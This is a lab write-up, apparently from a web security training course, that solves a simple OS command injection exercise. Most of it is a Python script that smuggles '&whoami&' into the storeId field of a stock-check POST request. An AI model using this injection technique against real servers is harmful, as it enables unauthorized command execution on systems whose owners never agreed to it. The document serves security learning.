1. OS command injection, simple case

Lets open the vulnerable lab:

Move around:

We have a post request lets test the parameters:

We will URL encode it:

And we have command execution.

Lets run whoami to complete the lab:

Solve it using a python3 script:

import requests  
import os  
import sys  
  
proxies = {  
    "http": "http://127.0.0.1:8080",  
    "https": "http://127.0.0.1:8080"  
}  
  
session = requests.session()  
  
  
def CommandInjection():  
    print("[*] Perform Command Injection.")  
    data = {"productId": "1",  
            "storeId": "3&whoami&"  
            }  
    print(session.post(url=url + "product/stock", data=data).text)  
  
  
if __name__ == "__main__":  
    if len(sys.argv) != 2:  
        script_name = os.path.basename(__file__)  
        print(f"[-] Usage: python {script_name} http://localhost/")  
        sys.exit(1)  
    url = sys.argv[1]  
    CommandInjection()  
    print("[+] Solved.")

PreviousCommand Injection Next2. Blind OS command injection with time delays

Last updated 1 month ago